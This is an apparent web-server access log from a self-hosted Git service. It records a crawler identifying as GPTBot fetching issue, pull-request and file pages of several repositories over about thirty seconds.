AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:27:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:27:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:27:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:27:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:27:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:27:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:27:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:27:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:27:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:19:27:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:19:27:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:27:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:27:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:27:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:27:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:27:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:27:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:27:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:27:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:27:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:27:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10264] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:27:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:27:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:27:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:27:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:27:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:27:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:27:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:27:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:27:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:27:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:27:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:27:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:27:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:27:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:27:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:27:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" +[17/Feb/2026:19:27:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:27:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:27:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:27:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:27:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:27:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:27:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:27:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:27:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 115819] [Gzip 6.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:27:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118289] [Gzip 6.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 